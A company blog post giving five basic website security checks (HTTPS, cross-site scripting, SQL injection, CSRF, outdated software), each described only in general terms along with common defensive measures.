5 Website Security Checks: Are you at risk?Leave a Comment
October is Security Month here at Server Density, and to mark the occasion we’ve partnered with our friends at Detectify to create a short series of security dispatches for you.
As we’ve written before, humans are the weakest link when it comes to safe systems, and there are a number of best practices that help us mitigate that risk. In this series, however, we will focus purely on technology.
Website Security Checks
According to the 2015 WhiteHat Security Statistics Report, an overwhelming majority of websites suffered from at least one serious vulnerability. Even when those vulnerabilities were addressed, their time-to-fix was unacceptably long. A great number of website owners are not aware of—let alone equipped to deal with—online security threats.
What follows is a collection of website security checks you can start with. It covers a number of known threats you need to prepare for, and secure your website against.
1. Lack of HTTPS
Traditional HTTP is not encrypted, and therefore, it is not secure. It allows an attacker to perform a man-in-the-middle attack, placing user credentials, cookies and other sensitive data at risk.
DigitalOcean have written a great set of instructions on how to acquire and install an SSL certificate, and you can read our suggestions here. SSL certificates are fairly inexpensive and can be issued within minutes. And if you’re an experienced sysadmin you can harden your website with stronger ciphers too.
2. Cross-Site Scripting
XSS is the most frequently occurring security threat in web applications. It allows attackers to inject malicious scripts on web pages, that affect all subsequent visitors.
Modern frameworks do a fairly good job at preventing XSS. This means legacy applications are the ones most exposed to this risk. You can mitigate XSS using libraries like DOMPurify. OWASP offers some comprehensive instructions on how to deal with XSS.
3. SQL Injection
This is a critical vulnerability affecting database servers. Attackers exploit any chinks in data entry mechanisms (i.e. username and password boxes) to tamper with SQL queries and break into the backend database of a website. This opens the possibility for data exfiltration and remote code execution.
While it may not be as prevalent as it used to be, some very high profile leaks (Bell Canada, Wall Street Journal, SAP among others) happened through SQL injection attacks. Check Point recently compiled a list of SQL injection trends.
Using parameterized queries and stored procedures can reduce the likelihood of attack. They work by helping the database to distinguish between user data and SQL code.
Web Application Firewalls (WAFs) can further reduce the risk of SQL injections by applying blacklists to known attack patterns using regex or similar techniques. This blocks most automated scanners (bots) and provides some low hanging fruit protection against opportunist attacks. Targeted attacks, however, will probably bypass these filters.
Finally, the presence of an ORM layer may help with SQL injection as it negates the need (or opportunity) to write actual SQL. However, this extra layer between code and database carries a CPU overhead. ORM is also known to generate complex and unoptimized SQL queries.
4. Cross-Site Request Forgery
A CSRF attack forces a user’s web browser to perform an unwanted action on a site the user is authenticated in. HTML forms that don’t offer integrity validation are mostly at risk.
You can prevent such vulnerabilities by applying CSRF tokens to forms that undertake authenticated actions (such as updating a user profile or a password change). All modern frameworks have settings for mitigating the risk of CSRF.
5. Outdated Software
Updating your software is one of the most straightforward ways to protect your website and your users. A single unpatched vulnerability may be all it takes for an attacker to compromise your server. Make sure your WordPress stack—including themes and plugins—is entirely up to date.
Upgrading to the latest bug-fixed versions of all your software should be a scheduled recurring activity.
In our next security dispatch we will look at some of the top API security checks you need to be aware of. To make sure you don’t miss a beat, sign up here. You should also read the other articles from our security month, including the API security holes you should be considering, and how to secure your servers.